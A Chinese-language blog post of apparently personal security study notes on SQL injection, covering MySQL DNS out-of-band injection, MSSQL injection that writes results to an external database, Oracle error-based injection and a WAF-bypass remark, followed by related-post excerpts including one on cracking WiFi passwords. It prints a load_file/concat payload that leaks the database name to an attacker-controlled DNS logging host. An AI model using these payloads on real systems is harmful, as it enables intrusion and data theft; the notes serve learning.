网络安全学习记录-10

最新推荐文章于 2024-08-08 22:10:43 发布
最新推荐文章于 2024-08-08 22:10:43 发布
阅读量4.5k 收藏
点赞数
文章标签: web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Leewy0326/article/details/123293180
版权

数据库注入

1.Mysql 注入-Dns 注入

注入没有回显:

DNS 注入-》让盲注变成显错注入

Load_File()读取文件

UNC路径

windows SMB 服务(共享文件)//desktop/529 SMB 服务因为他是请求共享文件 所以会发起数据包 load_File()支持unc路径

DNS日志: 记录某时某分谁请求我查某域名

搭建一个DNS服务器来承接域名解析,所有访问域名都会被记录

域名本身运营商解析,修改域名设置方法,强行执行某个IP去解析域名

DNS注入平台

dnslog.cn

select load_file(concat('//',database(),'.地址'))

obb 数据外带

1.目标得有网络

2.SMB服务 windows 自带,linux 不自带 即DNS注入不适用于linux

waf:不会检测txt jpg 后缀不会检测因为安全

web 容器特性

apache 他会对index.php/1.txt 请求的文件不存在会自动请求前一个,

into outfile

into dumpfile

2.MSSQL注入- 反弹注入

SQL SERVER

反弹注入

攻击者-》目标服务器(SQL 注入)

目标服务器(执行一个查询)-》插入到一个外部数据库

条件:

1.有sql注入 漏洞

2.有外部数据库 公网ip

sysobjects=> mssql特有的查询所有表 xytpe代表类型

3.oracle注入-报错注入

 oracle讲究语法 dual 虚表

select字段 from 表名

oracle 库被弱化 用户被强化 一个用户代表一个库

oracle 实现limit功能

1.采用不等于法

2.别名法

Leewy0326
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全学习笔记(1)
qq_40316844的博客
08-23 994
最近在学习网络安全方面的知识,首先是使用Wireshark。首先是搭建虚拟机环境: 搭建虚拟机 虚拟机的搭建就不多讲了,这里的软件采用的是VMware Workstation,具体的方法请自行百度,这里推荐一下华军软件园,不仅有软件,还有安装方法和激活服务等,虚拟机的系统选择常用的Ubuntu。 在成功的安装VMware Workstation后,启动创建虚拟机,在打开虚拟机的时候出现问题:一开始...
记录一次简单的网络安全学习
gfdr5的博客
12-29 361
屏幕上显示监听到的路由器bssid mac地址,信道ch,验证方式auth,essid名称等信息。我的电脑是联想拯救者,开机按下fn+f12,进入boot启动菜单,选择U盘启动。2、打开ewsa,选择导入数据,选第一个tcpdump,选择之前抓到的数据包,一般以.cap为后缀名。点击“开始破解”,“密码破解”,耐心等待破解完成,如果设置了八位数数字密码,一定可以拿到。1、生成字典文件,以8位数的纯数字为例,利用Java生成。等待设备连接,连接时会发送握手信号,此时握手包捕获成功。获取管理员权限,输入。
网络安全学习记录-12
Leewy0326的博客
03-12 523
越权-普通用户居然也饿能登录后台 越权:一个低权限用户可以进行高权限操作或者平级操作(用户A 修改用户B密码 网站网页 App 为主) 提权:指的是低权限用户通过技术手段提升到高权限(指的是计算机权限 用户权限-》管理权限) SQL注入 XSS CSRF 文件上传都是代码方面有问题(不需要人也可以测) 漏扫:企业级漏洞扫描工具 awvs/极光 逻辑安全漏洞:程序设计思路有问题, 水平越权:同权限账户可以互相影响(A B) 垂直越权:不同权限的账户可以互相影响(A B 可以影响管理员) 交叉越
网络安全学习笔记(一)
的博客
08-10 2210
入侵步骤**阶段一:搜索**​1、互联网搜索​2、社会工程学​3、垃圾数据搜寻​4、域名信息收集​注册人、注册邮箱​5、非入侵性的网络扫描​不违法,不危害他人计算机安全​**阶段2:扫描**​1、每一台局域网、广域网设备的品牌型号​2、开发的端口及应用服务​不如4439 3389 8080 等端口 阿帕奇等应用​3、操作系统内在的漏洞​看其系统有没有即使打补丁​4、保护性交叉的数据传输​**阶段三:获得权限**​。......
网络安全学习笔记(适合初学者)
cnds123的专栏
03-27 2305
网络安全学习笔记 一、 Ip欺骗(IP spoof)及防范原则 IP[地址]欺骗被用来从事非法活动,破坏网络安全,黑客使用IP欺骗就不会被抓到,还有一些黑客进行Dos攻击的时候,就可以隐藏真实的IP,这样攻击者就无法查到。IP欺骗有时候也可以用来被克隆某个内部网中的信息,这样有时候就可以避免开户名和密码验证而直接登录系统。 TCP中的SYN、RST、FIN中 含义 在TCP报文的报头...
网络安全学习笔记(6)
qq_40316844的博客
09-11 267
这章学习的主要内容是PE结构以及用C语言编写PE结构解析器。 首先学习PE结构: E_lfanew:文件的偏移0x3C(第60字节)处是是一个4字节的PE文件签名的偏移地址。 参数的末尾也就是文件的偏移0x3C(第60字节) //注释掉的不需要重点分析 1、DOS头:共40H(64字节) struct _IMAGE_DOS_HEADER{ 0X00 WORD e_magic; //※Ma...
网络安全等级保护学习记录--法律依据、定级指南
Leonardo的博客
07-29 7017
信息安全等级保护的要求 PART I  法律依据 1、网络安全等级保护开展的法律依据          2017.6.1正式实施的《网络安全法》(2016.11.7) 第二十一条 国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求,履行下列安全保护义务,保障网络免受干扰、破坏或者未经授权的访问,防止网络数据泄露或者被窃取、篡改: (一)制定内部安全管理制度和操作规...
带外数据OOB与紧急模式URG
dingmin1860的专栏
09-09 865
传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方.为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道.linux系统的套接字机制支持低层协议发送和接受带外数据.但是TCP协议没有真正意义上的带外数据.为了发送重要协议,TCP提供了一种称为紧急模式(urgent mode
网络安全学习笔记
weixin_33688840的博客
03-05 621
跨站脚本攻击(XSS Cross Site Script) 一、定义:黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户游览网页时,控制用户游览器攻击的一种行为。 二、分类: 1. 反射性XSS:把用户输入的数据反射给游览器(诱使用户“点击”一个恶意的链接)篡改链接->用户访问->跳转执...
网络安全等级保护学习记录--工作流程、技术要求、管理要求、工作步骤
Leonardo的博客
07-29 5695
1、工作流程 各阶段实施过程中,可参考的规范性标准依据如下: 系统定级阶段:《信息系统安全保护等级定级指南》 安全保护:《信息系统安全等级保护基本要求》、《信息系统安全等级保护实施指南》 检测评估:《信息系统安全等级保护基本要求》、《信息系统安全等级保护测评准则》、相关行业标准、用户自身业务安全需求 监督检查:《信息系统安全等级保护监督检查要求》   2、等级保护要求--技术要求和...
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 17万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
计算机网络学习笔记(七):网络安全
Haydee的博客
03-04 1万+
1  网络安全基本内容 安全包括哪些方面 操作系统内部的安全包括:数据存储安全、应用程序安全、操作系统安全。 此外还有网络安全、物理安全、用户安全教育。 本章重点介绍网络安全,即数据在传输过程中的安全。 计算机在网络上的通信面临以下的四种威胁: (1) 截获——从网络上窃听他人的通信内容。 (2) 中断——有意中断他人在网络上的通信。 (3) 篡改——故意篡...
网络安全学习
Erica_12137的博客
05-20 3393
安全学习的一些基本概念
记录一下自己学习网络安全的过程
daydayupergouzi的博客
09-06 2412
记录一下自己学习网络安全的过程 从八月份决定学习一下网络安全,完全从零开始,在这里记录一下,当作是学习笔记,也当作是过程记录,希望自己坚持下去 ...
(mysql的)DNS注入
weixin_60777183的博客
09-02 238
一、基础知识总结: DNS注入→让盲注变成显错注入 LOAD_FILE() :读取文件的函数 在phpstudy的cmd里用的时候,需要在从其他选项菜单→打开配置文件→mysql-ini的配置文件里加上: secure_file_priv= 配置好后重启,才好使。 举例:select load_file('C\\1.txt') 两个\\原因,其中一个是转义符。 可以写绝对路径,也可以相对路径。 UNC路径: Windows的SMB服务——可以共享文件 load_file 支持UNC路径。 http
软设之网络安全控制
最新发布
2301_81968528的博客
08-08 358
漏洞检测和安全风险评估技术,可预知主体受攻击的可能性和具体指证将要发生的行为和产生的后果。网络漏洞扫描技术主要包括网络模拟攻击,漏洞检测,报告服务进程,提取对象信息以及测评风险,提供安全建议和改进等功能,帮助用户控制可能发生的安全事件,最大可能消除安全隐患。IDS设备对于网络中的入侵行为往往是采用将入侵行为计入日志,并向网络管理员发出报警的方式来处理的,对于入侵行为并未主动的采取对应措施,响应方式单一。防火墙的作用是防止不希望的,未经授权的通信进出被保护的内部网络,通过边界控制强化内部网络的安全策略。
C++在网络安全领域的应用
2302_79331124的博客
08-04 1126
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 1015
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Web安全学习
荆鹏的博客
08-06 385
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值